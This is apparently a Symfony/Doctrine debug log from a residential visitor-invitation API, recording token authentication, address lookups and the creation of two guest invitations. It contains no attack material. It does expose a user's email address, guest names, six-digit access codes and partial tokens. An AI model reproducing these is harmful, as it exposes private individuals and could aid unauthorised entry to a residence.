[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-20 01:14:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:11] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 01:14:25] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-20 01:14:25] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:25] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-20 01:14:25] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-20 01:14:25] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 01:14:25] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:25] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:25] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:25] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:25] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:25] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
[2025-12-20 01:14:25] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-20 01:14:25] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"d4edf5db-16af-4f12-ade7-fd [...]","2":1,"3":"2025-12-20 01:14:25","4":"2025-12-20 01:14:25","5":"Jose","6":"Aysa","7":"404628","8":"/invitation/2a747460158151 [...]","9":"1","10":null,"11":"2025-12-20 01:14:00","12":null,"13":null,"14":null,"15":274,"16":398} []
[2025-12-20 01:14:25] doctrine.DEBUG: "COMMIT" [] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
[2025-12-20 01:14:25] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 01:14:25] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
[2025-12-20 01:14:25] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:25] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-20 01:14:25] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-20 01:14:25] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 01:14:25] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:25] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:25] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:25] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:25] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:25] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-20 01:14:25] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:25] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 01:14:40] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-20 01:14:40] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:40] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-20 01:14:40] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-20 01:14:40] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 01:14:40] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:40] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:40] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:40] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:40] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:40] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
[2025-12-20 01:14:40] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-20 01:14:40] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"c53b9621-0ec7-4aad-878c-b1 [...]","2":1,"3":"2025-12-20 01:14:40","4":"2025-12-20 01:14:40","5":"Arturo","6":"Cabrera","7":"777633","8":"/invitation/9acb4a182f886e [...]","9":"1","10":null,"11":"2025-12-20 01:14:00","12":null,"13":null,"14":null,"15":274,"16":398} []
[2025-12-20 01:14:40] doctrine.DEBUG: "COMMIT" [] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
[2025-12-20 01:14:40] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 01:14:40] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
[2025-12-20 01:14:40] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:40] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-20 01:14:40] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-20 01:14:40] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 01:14:40] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:40] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:40] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:40] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:40] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:40] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
